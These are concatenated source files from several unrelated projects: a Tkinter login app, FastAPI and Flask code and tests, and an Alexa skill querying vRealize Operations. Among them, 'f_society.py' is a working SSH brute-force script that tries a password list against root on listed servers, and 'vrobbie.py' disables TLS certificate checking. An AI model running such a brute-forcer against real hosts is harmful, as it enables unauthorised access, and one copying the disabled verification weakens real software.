#### File: controller/menu/merge_csv.py
```python
from model.dataControl import Model
from tkinter.messagebox import showerror, showinfo
def mergeFiles(target, dataview):
"""working with merging the target file data into the source file data
Args:
target (variable): the target file path which give file from the upload window
dataview (variable): the main window which will excute the method to control DES and upload window
"""
if target == "":
showerror("Error", "Please select to merge")
elif dataview.dataHandler.checkRecord() != dataview.lastModified:
showerror(
"Error", "There are change to database please update before upload the new data")
else:
dataControl = Model()
dataControl.upload(target)
showinfo("Upload success",
"The data is uploaded and will be loaded for viewing")
dataview.refresh()
dataview.closeUpload()
```
#### File: SDV602-Milestone3-QuangThanhDao/view/login.py
```python
import tkinter as tk
from tkinter import ttk
import view.setup as setup
from controller.login.auth import authentication
from controller.login.register import register
from model.connect import UserControl
class Login(tk.Tk):
"""Start an instance of login screen which allow user to sign up with top level window or login directly
When users login, the class would open to menu which is another class which handle the data view, update, delete while
destroy the current login to prevent multiple login.
"""
def __init__(self, *args, **kwargs):
self.userControl = UserControl()
tk.Tk.__init__(self, *args, **kwargs)
self.title(setup.app_name)
self.iconbitmap(setup.icon)
options = setup.pad10
option2 = setup.pad5
self.resizable(0, 0)
label = ttk.Label(self, text="Login").grid(
column=0, row=0, sticky="N", **options, columnspan=3)
self.check = False
# ANCHOR data input
lf = ttk.Frame(
self,
).grid(column=0, row=0, padx=10, pady=0)
password = tk.StringVar()
username = tk.StringVar()
label = ttk.Label(lf, text="Email").grid(
column=0, row=1, **options, ipadx=5, ipady=5)
email_entry = ttk.Entry(lf, textvariable=username)
email_entry.grid(
column=1, row=1, **options, columnspan=2)
label = ttk.Label(lf, text="Password").grid(
column=0, row=2, **options, ipadx=5, ipady=5)
password_entry = ttk.Entry(
lf, textvariable=password, show="*")
password_entry.grid(column=1, row=2, **options, columnspan=2)
# ANCHOR Buttons for main window
button_frame = ttk.Frame(
self,
).grid(column=1, row=1, padx=10, pady=10)
login_btn = ttk.Button(button_frame,
text="Login",
command=lambda: authentication(
self, email_entry.get(), password_entry.get())
).grid(column=1, row=3, **option2)
signup_btn = ttk.Button(button_frame,
text="Sign Up",
command=lambda: self.callSignup()
).grid(column=2, row=3, **option2)
quit_btn = ttk.Button(self,
text="Quit",
command=lambda: self.destroy()
).grid(column=2, row=4, **options)
def callSignup(self):
"""The function check for any instance of signup and only create a sign up window if there is none
"""
if self.check == False:
self.signupWindow()
def signupWindow(self):
"""function to create a sign up window as toplevel window
"""
self.check = True
self.signup = tk.Toplevel()
self.signup.title(setup.app_name)
self.signup.iconbitmap(setup.icon)
options = setup.pad10
label = ttk.Label(self.signup, text="Sign up").grid(
column=0, row=0, **options, columnspan=2)
self.signup.geometry("310x360+100+100")
self.signup.protocol("WM_DELETE_WINDOW", self.closeSignup)
# Create placeholder to store data
username = tk.StringVar()
password = tk.StringVar()
confirmPassword = tk.StringVar()
email = tk.StringVar()
lf = ttk.LabelFrame(self.signup, text="Login details")
lf.grid(column=0, row=1, padx=20, pady=20)
label = ttk.Label(lf, text="Email").grid(
column=0, row=3, **options)
email_entry = ttk.Entry(lf, textvariable=email)
email_entry.grid(
column=1, row=3, **options)
label = ttk.Label(lf, text="Username").grid(
column=0, row=5, **options)
username_entry = ttk.Entry(lf, textvariable=username)
username_entry.grid(
column=1, row=5, **options)
label = ttk.Label(lf, text="Password").grid(
column=0, row=7, **options)
password_entry = ttk.Entry(lf, textvariable=password, show="*")
password_entry.grid(
column=1, row=7, **options)
label = ttk.Label(lf, text="Confirm Password").grid(
column=0, row=9, **options)
confirmpassword_entry = ttk.Entry(
lf, textvariable=confirmPassword, show="*")
confirmpassword_entry.grid(column=1, row=9, **options)
button = ttk.Button(lf,
text="Sign Up",
command=lambda: register(self,
username_entry.get(), password_entry.get(), confirmpassword_entry.get(), email_entry.get())
).grid(column=0, row=11, **options, columnspan=2)
button = ttk.Button(self.signup,
text="Cancel",
command=lambda: self.closeSignup()
).grid(column=0, row=3, **options, sticky="SE")
def closeSignup(self):
"""This function make sure that the window is closed and allow to create new instance of Sign up window
"""
self.check = False
self.signup.destroy()
``` |
{
"source": "johndatserakis/find-the-state-api",
"score": 2
} |
#### File: alembic/versions/a1c5591554f0_create_score_table.py
```python
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects.postgresql import UUID
# revision identifiers, used by Alembic.
revision = "<KEY>"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"scores",
sa.Column(
"id",
UUID(as_uuid=True),
primary_key=True,
server_default=sa.text("uuid_generate_v4()"),
),
sa.Column("score", sa.String, index=True, nullable=False),
sa.Column("updated_date", sa.DateTime),
sa.Column(
"created_date", sa.DateTime, server_default=sa.text("now()"), nullable=False
),
)
def downgrade():
op.drop_table("scores")
```
#### File: app/routes/state.py
```python
from asyncpg.exceptions import UniqueViolationError
from fastapi import APIRouter, HTTPException, Path
from schemas.state import State, StateCreate, StateUpdate, StateDelete
from typing import List
import crud.state as crud
import uuid
router = APIRouter()
@router.get("/{id}", response_model=State)
async def read(id: uuid.UUID):
"""
Get item by id.
"""
item = await crud.get(id)
if not item:
raise HTTPException(status_code=404, detail="Item not found")
return item
@router.get("/name/{name}", response_model=State)
async def read_by_name(name: str):
"""
Get item by name.
"""
item = await crud.get_by_name(name)
if not item:
raise HTTPException(status_code=404, detail="Item not found")
return item
@router.get("", response_model=List[State])
async def read_all():
"""
Get all items
"""
return await crud.get_all()
# Commenting out the rest of the methods as they're not needed at this moment. They've been tested and do work
# correctly - good to have for the future.
# @router.post("", response_model=State, status_code=201)
# async def create(payload: StateCreate):
# """
# Create item.
# """
# try:
# item_id = await crud.create(payload)
# new_row = await crud.get(item_id)
# except UniqueViolationError:
# raise HTTPException(status_code=409, detail="Item already exists")
# except Exception:
# raise HTTPException(status_code=500, detail="Error processing request")
# return new_row
# @router.put("/{id}", response_model=State)
# async def update(id: uuid.UUID, payload: StateUpdate):
# """
# Update item.
# """
# item = await crud.get(id)
# if not item:
# raise HTTPException(status_code=404, detail="Item not found")
# try:
# item_id = await crud.update(id, payload)
# updated_row = await crud.get(item_id)
# except Exception:
# raise HTTPException(status_code=500, detail="Error processing request")
# return updated_row
# @router.delete("/{id}", response_model=StateDelete)
# async def delete(id: uuid.UUID):
# """
# Delete item.
# """
# try:
# await crud.delete(id)
# except Exception:
# raise HTTPException(status_code=500, detail="Error processing request")
# return {"id": id}
``` |
{
"source": "johndavidge/contact_store",
"score": 3
} |
#### File: contact_store/tests/test_contacts.py
```python
import json
test_contact = {
'username': 'test_contact',
'emails': [{'address': '<EMAIL>'}],
'first_name': 'Test',
'surname': 'Contact',
}
test_contact_2 = {
'username': 'test_contact_2',
'emails': [{'address': '<EMAIL>'}],
'first_name': '<NAME>',
'surname': 'Contact 2',
}
def create_contact(client, contact=test_contact):
return client.post('/contacts',
data=json.dumps(contact),
content_type='application/json')
def test_create_contact(client):
assert create_contact(client).status_code == 200
def test_create_contact_missing_data(client):
test_contact_incomplete = {
'username': 'test_contact',
'surname': 'Contact',
}
assert create_contact(client,
contact=test_contact_incomplete).status_code == 400
def test_show_contact(client):
assert client.get(
'/contacts/%s' % test_contact['username']).status_code == 404
create_contact(client)
response = client.get('/contacts/%s' % test_contact['username'])
assert response.status_code == 200
assert response.json['username'] == test_contact['username']
assert response.json['emails'] == test_contact['emails']
assert response.json['first_name'] == test_contact['first_name']
assert response.json['surname'] == test_contact['surname']
response = client.get(
'/contacts/%s' % test_contact['emails'][0]['address'])
assert response.status_code == 200
assert response.json['username'] == test_contact['username']
assert response.json['emails'] == test_contact['emails']
assert response.json['first_name'] == test_contact['first_name']
assert response.json['surname'] == test_contact['surname']
def test_update_contact(client):
create_contact(client)
response = client.put('/contacts/%s' % test_contact['username'],
data=json.dumps(test_contact_2),
content_type='application/json')
assert response.status_code == 200
response = client.get('/contacts/%s' % test_contact['username'])
assert response.status_code == 404
response = client.get('/contacts/%s' % test_contact_2['username'])
assert response.status_code == 200
assert response.json['username'] == test_contact_2['username']
assert response.json['emails'] == test_contact_2['emails']
assert response.json['first_name'] == test_contact_2['first_name']
assert response.json['surname'] == test_contact_2['surname']
def test_delete_contact(client):
create_contact(client)
assert client.delete(
'/contacts/%s' % test_contact['username']).status_code == 200
assert client.get(
'/contacts/%s' % test_contact['username']).status_code == 404
def test_list_contacts(client, app):
response = client.get('/contacts')
assert response.status_code == 200
assert response.json == {'contacts': []}
create_contact(client)
response = client.get('/contacts')
assert response.status_code == 200
assert response.json == {'contacts': [test_contact]}
create_contact(client, contact=test_contact_2)
response = client.get('/contacts')
assert response.status_code == 200
assert response.json == {'contacts': [test_contact, test_contact_2]}
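# These tests rely on pytest fixtures named "client" and "app" (presumably a Flask test client and
# app factory defined in a conftest.py that is not shown here); they are run with a plain `pytest` call.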
``` |
{
"source": "johnddias/security-demo",
"score": 3
} |
#### File: johnddias/security-demo/f_society.py
```python
import paramiko
import socket
def runSshCmd(hostname, username, password, cmd, timeout=None):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname, username=username, password=password,
allow_agent=False, look_for_keys=False, timeout=5)
stdin, stdout, stderr = client.exec_command(cmd)
data = stdout.read()
print(data)
client.close()
fo = open("server.lst", "r")
hosts = fo.readlines()
fo.close()
fo = open("passwords.lst", "r")
passwords = fo.readlines()
fo.close()
for h in hosts:
for p in passwords:
try:
runSshCmd(h.rstrip(), "root", p.rstrip(), "uname -a")
except paramiko.AuthenticationException, e:
print("Host %s result: %s" % (h.rstrip(), e))
except paramiko.SSHException, e:
print("Host %s result: %s" % (h.rstrip(), e))
except socket.error, e:
print("Host %s result: %s" % (h.rstrip(), e))
else:
print("Host %s connected with password %s" % (h.rstrip(), p.rstrip()))
``` |
{
"source": "johnddias/vrobbie",
"score": 2
} |
#### File: johnddias/vrobbie/vrobbie.py
```python
import json
import logging
import requests
import collections
import time
import re
import sys
import os
from threading import Thread
from operator import itemgetter
from itertools import groupby
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session, request, context, version
# Vars and Configurations
bearertoken = ""
# Edit with IP or FQDN of vrops and LI node
vropsHost = ""
liHost = ""
# Authentication is intially via credentials set. Subsequent calls use a
# bearer token.
vropsuser = ""
vropspassword = ""
vropsauthsource = "local"
liprovider = "ActiveDirectory"
liusername = ""
lipassword = ""
# For some labs, using self-signed will result in error during request due to cert check
# flip this flag to False to bypass certificate checking in those cases. I have suppressed the warning
# normally thrown by urllib3 but this is NOT RECOMMENDED!
verify = False
if not verify:
requests.packages.urllib3.disable_warnings()
app = Flask(__name__)
ask = Ask(app,"/")
logging.getLogger("flask_ask").setLevel(logging.DEBUG)
##############################################
# HELPERS
# - Fetchers
# - Handling voice service errors
# - Parsing and preparing response_msg
##############################################
def datacenter_report():
while True:
dc_report_dict = dict()
token = json.loads(liGetToken(liusername, lipassword, liprovider))
dc_report_dict["vMotions"] = json.loads(loginsightQuery("timestamp/LAST 86400000", "bin-width=all&aggregation-function=UCOUNT&aggregation-field=com.vmware.vsphere:vmw_hostd_vmotion_id", token["sessionId"]))
dc_report_dict["DRS vMotions"] = json.loads(loginsightQuery("timestamp/LAST 86400000/text/CONTAINS DrmExecuteVMotionLRO", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["VMs Created"] = json.loads(loginsightQuery("timestamp/LAST 86400000/vc_event_type/CONTAINS com.vmware.vim25.VmCreatedEvent/vc_event_type/CONTAINS com.vmware.vim25.vmclonedevent", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["VMs Deleted"] = json.loads(loginsightQuery("timestamp/LAST 86400000/vc_event_type/CONTAINS com.vmware.vim25.VmRemovedEvent", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["RConsole Sessions"] = json.loads(loginsightQuery("timestamp/LAST 86400000/text/CONTAINS Local connection for mks established", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
with open("prefetch/dcreport", 'w') as outfile:
json.dump(dc_report_dict, outfile)
print "dcreport updated at " + time.strftime("%Y-%m-%d %H:%M:%S")
time.sleep(300)
def more_info():
#Called when user wants more information on the impacted resource from the Alerts tree
if session.attributes["CurrentTree"] == "Alerts":
resource = vropsRequest("api/resources/"+session.attributes["CurrentObject"],"GET")
alertsQueryPayload = {
'resource-query': {
'resourceId': [session.attributes["CurrentObject"]]
},
'activeOnly': True
}
resourceAlerts = vropsRequest("api/alerts/query","POST",payload=alertsQueryPayload)
resourceName = resource["resourceKey"]["name"]
resourceHealth = resource["resourceHealth"]
resourceAlertCount = resourceAlerts["pageInfo"]["totalCount"]
outputSpeech = "The resource; {0}; is; {1}; for health status. There are {2} alerts associated with this resource. Shall I read those alerts?".format(resourceName, resourceHealth, resourceAlertCount)
with open("sessionData/"+session.sessionId+"resAlerts", 'w') as outfile:
json.dump(resourceAlerts, outfile)
session.attributes["ResAlertsIndex"] = 0
session.attributes["CurrentTree"] = "Resource"
return outputSpeech
#Called when user wants more information on an alert from the Resource tree
if session.attributes["CurrentTree"] == "Resource":
alert = vropsRequest("api/alerts/"+session.attributes["CurrentAlert"],"GET")
alertDef = vropsRequest("api/alertdefinitions/"+alert["alertDefinitionId"],"GET")
alertDesc = alertDef["description"]
recommendations=alertDef["states"][0]["recommendationPriorityMap"]
if (len(recommendations) == 1):
recQualifier = "only"
else:
recQualifier = "first"
recDesc = vropsRequest("api/recommendations/"+recommendations.keys()[0],"GET")
outputSpeech = "{0}. The {1} recommendation is as follows; {2}".format(alertDesc, recQualifier, recDesc["description"])
return outputSpeech
#Called when user wants more information on groups of alerts for a definition
if session.attributes["CurrentTree"] == "GroupedAlerts":
payload = json.loads('{"resourceId":'+ json.dumps(session.attributes["impactedResources"]) +'}')
resources = vropsRequest("api/resources/query","POST",payload=payload)
resourceList = resources["resourceList"]
resourceDict = {}
for res in resourceList:
resourceDict[res["resourceKey"]["name"]] = res["identifier"]
session.attributes["resourceDict"] = resourceDict
outputSpeech = ""
return outputSpeech
def continues():
if session.attributes["CurrentTree"] == "Alerts":
with open("sessionData/"+session.sessionId+"badgeAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
criticalAlerts = alerts_by_sev(alerts,"CRITICAL")
alert = criticalAlerts[session.attributes["AlertsIndex"]]
alertDefinition = alert["alertDefinitionName"]
resource = vropsRequest(alert["links"][1]["href"][10:] ,"GET")
resourceName = resource["resourceKey"]["name"]
if (len(criticalAlerts)-1 == session.attributes["AlertsIndex"]):
outputSpeech = "The resource; {0}; has a critical alert, {1}. There are no more cirtical alerts. Would you like more information on this resource?".format(resourceName, alertDefinition)
else:
outputSpeech = "The resource; {0}; has a critical alert, {1}. Next alert or more information on this resource?".format(resourceName, alertDefinition)
session.attributes["AlertsIndex"] += 1
session.attributes["CurrentObject"] = resource["identifier"]
return outputSpeech
if session.attributes["CurrentTree"] == "GroupedAlerts":
with open("sessionData/"+session.sessionId+"groupAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
definition = alerts[session.attributes["AlertsIndex"]]
alertDefinition = definition[0]["alertDefinitionName"]
impactedResources = []
for res in definition:
impactedResources.append(res["resourceId"])
session.attributes["impactedResources"] = impactedResources
session.attributes["alertDefinition"] = alertDefinition
numOfResources = len(definition)
if numOfResources == 1:
resourceText = "resource is"
else:
resourceText = "resources are"
if (len(alerts)-1 == session.attributes["AlertsIndex"]):
outputSpeech = "For the alert: {0}, {1} {2} impacted. There are no more alerts. More information on this alert?".format(alertDefinition, numOfResources, resourceText)
else:
outputSpeech = "For the alert: {0}, {1} {2} impacted. Next or more info?".format(alertDefinition, numOfResources, resourceText)
session.attributes["AlertsIndex"] += 1
return outputSpeech
if session.attributes["CurrentTree"] == "Resource":
with open("sessionData/"+session.sessionId+"resAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
criticalAlerts = alerts_by_sev(alerts,"CRITICAL")
alert = criticalAlerts[session.attributes["ResAlertsIndex"]]
alertDefinition = alert["alertDefinitionName"]
resource = vropsRequest(alert["links"][1]["href"][10:] ,"GET")
resourceName = resource["resourceKey"]["name"]
if (len(criticalAlerts)-1 == session.attributes["ResAlertsIndex"]):
outputSpeech = "The resource; {0}; has a critical alert, {1}. There are no more alerts. Would you like more information on this alert?".format(resourceName, alertDefinition)
elif len(criticalAlerts) == 0:
outputSpeech = "Reading active alerts from newest to oldest. The resource; {0}; has a critical alert, {1}. Next alert or more information on this alert?".format(resourceName, alertDefinition)
session.attributes["ResAlertsIndex"] += 1
else:
outputSpeech = "The resource; {0}; has a critical alert, {1}. Next alert or more information on this alert?".format(resourceName, alertDefinition)
session.attributes["ResAlertsIndex"] += 1
session.attributes["CurrentAlert"] = alert["alertId"]
return outputSpeech
def on_element_select(token):
if session.attributes["CurrentTree"] == "GroupedAlerts":
resource = vropsRequest("api/resources/"+token,"GET")
resourceProps = vropsRequest("api/resources/"+token+"/properties","GET")
resourceLatest = vropsRequest("api/resources/"+token+"/stats/latest","GET")
if resource["resourceKey"]["resourceKindKey"] == "VirtualMachine":
#Build complete response Here
vmname = resource["resourceKey"]["name"]
guestOS = [d["value"] for d in resourceProps["property"] if d["name"]=="config|guestFullName"][0]
numCpu = [d["value"] for d in resourceProps["property"] if d["name"]=="config|hardware|numCpu"][0]
memKB = [d["value"] for d in resourceProps["property"] if d["name"]=="config|hardware|memoryKB"][0]
toolsStatus = [d["value"] for d in resourceProps["property"] if d["name"]=="summary|guest|toolsRunningStatus"][0]
toolsVersion = [d["value"] for d in resourceProps["property"] if d["name"]=="summary|guest|toolsVersion"][0]
#guestDiskPercent = [d["statKey"]["data"] for d in resourceLatest["values"]["stat-list"]["stat"] if d["statKey"]["key"]=="guestfilesystem|percentage_total"]
text = {
"secondaryText": {
"type": "RichText",
"text": "<br/><b>Number of vCPU: </b>" + numCpu + "<br/>" + \
"<b>Memory Allocation (KB): </b>" + memKB + "<br/>" + \
"<b>Guest OS Name: </b>" + guestOS + "<br/>" + \
"<b>Tools Status: </b>" + toolsStatus + "<br/>" + \
"<b>Tools Version: </b>" + toolsVersion + "<br/>"
#"<b>Guest Filesystem Used: </b>" + guestDiskPercent + "%%<br/>"
},
"primaryText": {
"type": "RichText",
"text": "<font size='3'>"+resource["resourceKey"]["name"]+"</font>"
}
}
fullResponse = question("Here are the " + resource["resourceKey"]["resourceKindKey"] + " details"). \
display_render(title=resource["resourceKey"]["resourceKindKey"] + "details",template="BodyTemplate1",text=text,background_image_url=render_template('backgroundImageURL'),backButton='VISIBILE')
return fullResponse
def backout():
if session.attributes["CurrentTree"] == "Resource":
session.attributes["CurrentTree"] = "Alerts"
outputSpeech = "Returning to Critical Alerts list."
elif session.attributes["CurrentTree"] == "GroupedAlerts":
session.attributes["CurrentTree"] = ""
outputSpeech = "I am waiting for your query"
elif session.attributes["CurrentTree"] == "Alerts":
sessionCleanup()
session.attributes["CurrentTree"] = ""
outputSpeech = "I am waiting for your query"
else:
sessionCleanup()
outputSpeech = "I am waiting for your query"
return outputSpeech
def interactive_resp(data):
if session.attributes["CurrentTree"] == "GroupedAlerts":
listItems = []
resDict = session.attributes["resourceDict"]
for res in resDict:
listItem = {
"token":resDict[res],
"textContent": {
"primaryText": {
"text":res,
"type":"PlainText"
}
}
}
listItems.append(listItem)
enhancedResponse = question("Here are the impacted objects.").list_display_render(template="ListTemplate1", title="Impacted Objects", backButton="VISIBILE", token=None, \
background_image_url=render_template('backgroundImageURL'), listItems=listItems)
return enhancedResponse
def liGetToken(user=liusername, passwd=lipassword, authSource=liprovider):
url = "https://" + liHost + "/api/v1/sessions"
payload = "{\n \"provider\":\"" + liprovider + "\",\n \"username\":\"" + liusername + "\",\n \"password\":\"" + lipassword + "\"\n}"
headers = {
'accept': "application/json",
'content-type': "application/json"
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
def vropsGetToken(user=vropsuser, passwd=vropspassword, authSource=vropsauthsource, host=vropsHost):
if not bearertoken:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + vropsuser + "\",\r\n \"authSource\" : \"" + vropsauthsource + "\",\r\n \"password\" : \"" + <PASSWORD> + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
elif int(bearertoken["validity"])/1000 < time.time():
url = "https://" + host + "/suite-api/api/versions"
headers = {
'authorization': "vRealizeOpsToken " + bearertoken["token"],
'accept': "application/json"
}
response = requests.request("GET", url, headers=headers, verify=verify)
if response.status_code == 401:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + vropsuser + "\",\r\n \"authSource\" : \"" + vropsauthsource + "\",\r\n \"password\" : \"" + <PASSWORD> + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
else:
return json.dumps(bearertoken)
else:
return json.dumps(bearertoken)
def loginsightQuery(constraints,params,token):
url = "https://" + liHost + "/api/v1/aggregated-events/" + constraints + "?" + params
headers = {
'authorization': 'Bearer ' + token
}
response = requests.request('GET', url, headers=headers, verify=verify)
return response.text
def vropsRequest(request,method,querystring="",payload=""):
global bearertoken
bearertoken = json.loads(vropsGetToken())
url = "https://" + vropsHost + "/suite-api/" + request
querystring = querystring
headers = {
'authorization': "vRealizeOpsToken " + bearertoken["token"],
'accept': "application/json",
'content-type': "application/json"
}
if (querystring != "") and (payload != ""):
response = requests.request(method, url, headers=headers, params=querystring, json=payload, verify=verify)
elif (querystring != ""):
response = requests.request(method, url, headers=headers, params=querystring, verify=verify)
elif (payload != ""):
response = requests.request(method, url, headers=headers, json=payload, verify=verify)
else:
response = requests.request(method, url, headers=headers, verify=verify)
print ("Request " + response.url + " returned status " + str(response.status_code))
print payload
return response.json()
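# Illustrative call patterns, mirroring how vropsRequest is used elsewhere in this file:
#     vropsRequest("api/resources", "GET", querystring="resourceKind=vSAN World")
#     vropsRequest("api/alerts/query", "POST", payload={...})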
def translate_resource_intent(resource):
resString = ""
vropsResKindString = {
'bms':'virtualmachine',
'bm':'virtualmachine',
'vms':'virtualmachine',
'vm':'virtualmachine',
'hosts': 'hostsystem',
'host': 'hostsystem',
'clusters': 'clustercomputeresource',
'cluster': 'clustercomputeresource',
'datastores': 'datastore',
'datastore': 'datastore'
}
# if intent['slots']['resource']['value'] in vropsResKindString:
resString = vropsResKindString.get(resource.lower())
return resString
def speechify_resource_intent(resource,plurality):
vocalString = ""
vocalStrings = {
'bm':'virtual machine',
'vm':'virtual machine',
'host': 'host system',
'cluster': 'cluster',
'datastore': 'data store',
'bms':'virtual machine',
'vms':'virtual machine',
'hosts': 'host system',
'clusters': 'cluster',
'datastores': 'data store'
}
if plurality:
vocalString = vocalStrings.get(resource.lower()) + "s"
else:
vocalString = vocalStrings.get(resource.lower())
return vocalString
def alerts_by_sev(alerts,sev):
filteredAlerts = []
if any(x == sev for x in ["INFO","WARNING","IMMEDIATE","CRITICAL"]):
for alert in alerts["alerts"]:
if alert["alertLevel"] == sev:
filteredAlerts.append(alert)
return filteredAlerts
def group_alerts_by_def(alerts,groupkey):
sortedAlerts = sorted(alerts, key=itemgetter(groupkey))
groupedAlerts = []
for key, items in groupby(sortedAlerts, itemgetter(groupkey)):
groupedAlerts.append(list(items))
return groupedAlerts
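# Illustrative behaviour: alerts that share the same grouping key end up in one sub-list, e.g.
#     group_alerts_by_def(alerts["alerts"], "alertDefinitionId")
#     # -> [[alertA1, alertA2], [alertB1], ...]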
def sessionCleanup():
dir = "sessionData"
files = os.listdir(dir)
for file in files:
if file.startswith(session.sessionId):
os.remove(os.path.join(dir,file))
#####################################################
# Invocations
#####################################################
@ask.launch
def welcome_msg():
welcome_msg = render_template('welcome')
textContent = {
'primaryText': {
'text':'<font size="3">Intelligent Operations</font>',
'type':'RichText'
}
}
if (context.System.device.supportedInterfaces.Display):
return question(welcome_msg).display_render(
title='Welcome to vRealize Operations',template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'),image=render_template('vrops340x340ImageURL'), \
hintText="Get Critical VM alerts")
else:
return question(welcome_msg)
@ask.intent('AMAZON.YesIntent')
def yesIntent():
outputSpeech = continues()
textContent = {
'primaryText': {
'text':"<font size='3'>"+outputSpeech+"</font>",
'type':'RichText'
}
}
title = 'Welcome to vRealize Operations'
image = ""
if (session.attributes["CurrentTree"] == "GroupedAlerts"):
title = "Alerts by Definition"
image = render_template('alert' + session.attributes['groupCriticality'] + 'ImageURL')
if (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title=title,template="BodyTemplate1",text=textContent,background_image_url=render_template('backgroundImageURL'),image=image)
else:
return question(outputSpeech)
@ask.intent('AMAZON.NextIntent')
def nextIntent():
outputSpeech = continues()
textContent = {
'primaryText': {
'text':"<font size='3'>"+outputSpeech+"</font>",
'type':'RichText'
}
}
title = 'Welcome to vRealize Operations'
image = ""
if (session.attributes["CurrentTree"] == "GroupedAlerts"):
title = "Alerts by Definition"
image = render_template('alert' + session.attributes['groupCriticality'] + 'ImageURL')
if (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title=title,template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'),image=image)
else:
return question(outputSpeech)
@ask.intent('MoreInformationIntent')
def MoreInformationIntent():
outputSpeech = more_info()
textContent = {
'primaryText': {
'text':outputSpeech,
'type':'PlainText'
}
}
if ((session.attributes["CurrentTree"] == "GroupedAlerts") and (context.System.device.supportedInterfaces.Display)):
enhancedResponse = interactive_resp(outputSpeech)
return enhancedResponse
elif (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title='Welcome to vRealize Operations',template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'))
else:
if (session.attributes["CurrentTree"]):
return question(outputSpeech)
else:
return question("I'm sorry, I don't understand your request")
@ask.intent('AMAZON.NoIntent')
def noIntent():
outputSpeech = backout()
textContent = {
'primaryText': {
'text':'Intelligent Operations',
'type':'PlainText'
}
}
if (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title='Welcome to vRealize Operations',template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'))
else:
return question(outputSpeech)
@ask.intent('Amazon.CancelIntent')
def cancelIntent():
outputSpeech = backout()
return question(outputSpeech)
@ask.intent('vSANStatusIntent')
def vsanstatus():
#build query Parameters
vsanworld_res = vropsRequest("api/resources","GET",querystring="resourceKind=vSAN World")
vsan_res_id = vsanworld_res["resourceList"][0]["identifier"]
begin = int(round(time.time()*1000-21600000))
end = int(round(time.time()*1000))
querystring = {"begin":begin,"end":end,"rollUpType":"AVG","intervalQuantifier":"7", \
"intervalType":"HOURS",\
"statKey": [ "summary|total_latency", \
"summary|total_iops", \
"summary|total_number_vms", \
"summary|total_cluster_count", \
"summary|vsan_diskspace_capacity", \
"summary|vsan_diskspace_capacity_used", \
"summary|remaining_capacity" ], \
"resourceId":vsan_res_id, }
#execute query and process
response = vropsRequest("api/resources/stats","GET",querystring)
#building response
stats_dict = dict()
for statitem in response["values"][0]["stat-list"]["stat"]:
stat_key = statitem["statKey"]["key"].split("|")[1].replace("_"," ").title()
if (stat_key.find("Cluster Count") != -1):
stat_key = "Number of Clusters"
if (stat_key.find("Capacity") != -1):
stat_key = stat_key + " in TB"
if (stat_key.find("Vsan") != -1):
stat_key = stat_key.replace("Vsan","")
if (stat_key.find("Total") != -1):
stat_key = stat_key.replace("Total","Average")
if (stat_key.find("Iops") != -1):
stat_key = stat_key.replace("Iops","IOPS")
if (stat_key.find("Vms") != -1):
stat_key = stat_key.replace("Vms","of VMs")
stat_key = stat_key.replace("Average","")
stats_dict[stat_key] = str(int(statitem["data"][0]))
#TODO add ordering to display so items appear in some logical ordering
secondaryText = "<br/>"
for key, value in sorted(stats_dict.iteritems(), key=lambda (k,v): (v,k)):
secondaryText = secondaryText + "<b> %s:</b> %s <br/>" %(key,value)
secondaryText = secondaryText + "<br/>"
text = {
"tertiaryText": {
"type":"RichText",
"text":"6 hour average statistics shown."
},
"secondaryText": {
"type": "RichText",
"text": secondaryText
},
"primaryText": {
"type": "RichText",
"text": "<b><font size='7'>vSAN Status</font></b>"
}
}
enhancedResponse = question("v SAN Status Report.").display_render(template="BodyTemplate2", title="Datacenter Operations", text=text,backButton="VISIBILE", token=None, \
background_image_url=render_template('backgroundImageURL'),image=render_template('vsan340x340ImageURL'))
return enhancedResponse
@ask.intent('DataCenterCapacityIntent')
def dccapacity():
return question("Data Center Capacity Report")
@ask.intent('DataCenterActivityIntent')
#Runs several Log Insight and vROps queries to build a report for echo show
#TODO Make sure to add device checking and optimize for echo voice only
def dcactivity():
secondaryText = "<br/>"
with open("prefetch/dcreport", 'r') as dcreport:
report_data = json.load(dcreport)
for metric, value in report_data.iteritems():
item = "<b>Number of " + metric + ": </b>"
if not (value["bins"]):
item = item + "None"
else:
item = item + str(value["bins"][0]["value"])
secondaryText = secondaryText + item + "<br/>"
text = {
"secondaryText": {
"type": "RichText",
"text": secondaryText
},
"primaryText": {
"type": "RichText",
"text": "<font size='5'>Datacenter Activity Past 24 Hours</font>"
}
}
enhancedResponse = question("Datacenter Activity in the Past 24 Hours.").display_render(template="BodyTemplate2", title="Datacenter Operations", text=text,backButton="VISIBILE", token=None, \
background_image_url=render_template('backgroundImageURL'), image=render_template('vsphere340x340ImageURL'))
return enhancedResponse
@ask.intent('GroupAlertsIntent')
#Starts a tree to read active alerts grouped by alert definition for the stated resource kind
